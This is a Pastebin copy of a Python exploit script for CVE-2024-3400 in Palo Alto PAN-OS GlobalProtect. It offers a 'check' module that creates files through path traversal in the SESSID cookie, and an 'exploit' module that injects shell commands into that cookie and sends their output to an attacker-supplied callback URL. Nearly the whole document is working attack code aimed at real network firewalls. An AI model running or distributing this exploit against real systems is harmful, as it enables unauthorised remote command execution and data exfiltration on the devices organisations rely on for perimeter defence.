Advertisement
FlyFar

Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation - CVE-2024-3400

Apr 22nd, 2024
838
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.78 KB | Cybersecurity | 0 0
  1. # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
  2. # Date: 21 Apr 2024
  3. # Exploit Author: Kr0ff
  4. # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
  5. # Software Link: -
  6. # Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3
  7. #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
  8. #          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
  9. # Tested on: Debian
  10. # CVE : CVE-2024-3400
  11.  
  12. #!/usr/bin/env python3
  13.  
  14. import sys
  15.  
  16. try:
  17.     import argparse
  18.     import requests
  19. except ImportError:
  20.     print("Missing dependencies, either requests or argparse not installed")
  21.     sys.exit(2)
  22.  
  23. # https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
  24. # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  25.  
  26. def check_vuln(target: str, file: str) -> bool:
  27.     ret = False
  28.    
  29.     uri = "/ssl-vpn/hipreport.esp"
  30.    
  31.     s = requests.Session()
  32.     r = ""
  33.    
  34.     headers = {
  35.                 "User-Agent" : \
  36.                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
  37.                 "Content-Type": "application/x-www-form-urlencoded",
  38.                 "Cookie": \
  39.                         f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
  40.     }
  41.    
  42.     headers_noCookie = {
  43.                 "User-Agent" : \
  44.                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
  45.     }
  46.    
  47.     if not "http://" or not "https://" in target:
  48.         target = "http://" + target  
  49.         try:
  50.             r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  51.         except requests.exceptions.Timeout or requests.ConnectionError as e:
  52.             print(f"Request timed out for \"HTTP\" !{e}")
  53.  
  54.         print("Trying with \"HTTPS\"...")
  55.  
  56.         target = "https://" + target
  57.         try:
  58.             r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  59.         except requests.exceptions.Timeout or requests.ConnectionError as e:
  60.             print(f"Request timed out for \"HTTPS\"")
  61.             sys.exit(1)
  62.     else:
  63.         r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  64.  
  65.     if r.status_code == 200:
  66.         r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
  67.         if r.status_code == 403:
  68.             print("Target vulnerable to CVE-2024-3400")
  69.             ret = True
  70.     else:
  71.         return ret
  72.  
  73.     return ret
  74.    
  75.    
  76.  
  77. def cmdexec(target: str, callback_url: str, payload: str) -> bool:
  78.     ret = False
  79.     p = ""
  80.  
  81.     if " " in payload:
  82.         p = payload.replace(" ", "${IFS)")
  83.  
  84.     uri = "/ssl-vpn/hipreport.esp"
  85.  
  86.     headers = {
  87.                 "User-Agent" : \
  88.                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
  89.                 "Content-Type": "application/x-www-form-urlencoded",
  90.                 "Cookie": \
  91.                         f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
  92.  
  93.             }
  94.  
  95.     s = requests.Session()
  96.     r = ""
  97.    
  98.     if not "http://" or not "https://" in target:
  99.         target = "http://" + target  
  100.         try:
  101.             r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  102.         except requests.exceptions.Timeout or requests.ConnectionError as e:
  103.             print(f"Request timed out for \"HTTP\" !{e}")
  104.  
  105.         print("Trying with \"HTTPS\"...")
  106.  
  107.         target = "https://" + target
  108.         try:
  109.             r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  110.         except requests.exceptions.Timeout or requests.ConnectionError as e:
  111.             print(f"Request timed out for \"HTTPS\"")
  112.             sys.exit(1)
  113.     else:
  114.         r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
  115.  
  116.     if not "Success" in r.text:
  117.         return ret
  118.  
  119.     else:
  120.         ret = True
  121.  
  122.     return ret
  123.  
  124. #Initilize parser for arguments
  125. def argparser(selection=None):
  126.     parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
  127.    
  128.     subparser = parser.add_subparsers( help="Available modules", dest="module")
  129.    
  130.     exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
  131.     exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
  132.     exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
  133.     exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
  134.     #---------------------------------------
  135.     check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
  136.     check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
  137.     check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )
  138.  
  139.     args = parser.parse_args(selection)
  140.     args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
  141.    
  142.     if args.module == "exploit":    
  143.         cmdexec(args.target, args.callbackurl, args.payload)
  144.  
  145.     if args.module == "check":
  146.         check_vuln(args.target, args.filename)
  147.  
  148. if __name__ == "__main__":
  149.     argparser()
  150.     print("Finished !")
  151.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement